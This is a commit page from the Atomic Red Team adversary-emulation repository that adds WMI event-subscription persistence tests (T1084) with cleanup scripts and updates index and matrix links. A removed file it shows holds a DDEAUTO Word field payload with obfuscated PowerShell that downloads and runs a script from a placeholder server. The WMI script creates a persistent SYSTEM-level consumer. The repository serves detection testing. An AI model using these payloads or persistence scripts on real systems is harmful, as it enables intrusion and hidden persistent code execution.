security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #220 from redcanaryco/T1084

Browse Source 
T1084
This commit is contained in:
Michael Haag
2018-05-25 11:07:09 -04:00
committed by GitHub
parent dcb8bffd78 bc6b72b8e4
commit 6cf05f4e35
8 changed files with 151 additions and 85 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Persistence/Office_Application_Startup.md
-28
View File
@@ -1,28 +0,0 @@
# Office Application Startup
MITRE ATT&CK Technique: [T1137](https://attack.mitre.org/wiki/Technique/T1137)
## DDEAUTO
1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click ok.
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn or SensePost
7. Save the Word document.
* [SensePost DDEAUTO](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
* [TrustedSec - Unicorn](https://github.com/trustedsec/unicorn)
Generate the payload and download.ps1 following the Unicorn instructions, or to make one "just work", follow the steps below.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
## Word VBA Macro
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md
-53
View File
@@ -1,53 +0,0 @@
## Windows Management Instrumentation Event Subscription
MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084)
### Persistence
Example:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Cleanup:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
#### References
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
atomics/T1084/T1084.md
+79
View File
@@ -0,0 +1,79 @@
# T1084 - Windows Management Instrumentation Event Subscription
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
<blockquote>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)
Platforms: Windows
Data Sources: WMI Objects
Permissions Required: Administrator, SYSTEM</blockquote>
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #2 - Persistence Cleanup](#atomic-test-2---persistence-cleanup)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
<br/>
<br/>
## Atomic Test #2 - Persistence Cleanup
Run from an administrator powershell window
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
<br/>
atomics/T1084/T1084.yaml
+64
View File
@@ -0,0 +1,64 @@
---
attack_technique: T1084
display_name: Windows Management Instrumentation Event Subscription
atomic_tests:
- name: Persistence
description: |
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
supported_platforms:
- windows
executor:
name: powershell
command: |
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
- name: Persistence Cleanup
description: |
Run from an administrator powershell window
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
supported_platforms:
- windows
executor:
name: powershell
command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
atomics/index.md
+3 -1
View File
@@ -82,7 +82,9 @@
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# defense-evasion
atomics/matrix.md
+1 -1
View File
@@ -55,7 +55,7 @@
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
atomics/windows-index.md
+3 -1
View File
@@ -182,7 +182,9 @@
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# discovery
atomics/windows-matrix.md
+1 -1
View File
@@ -40,7 +40,7 @@
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |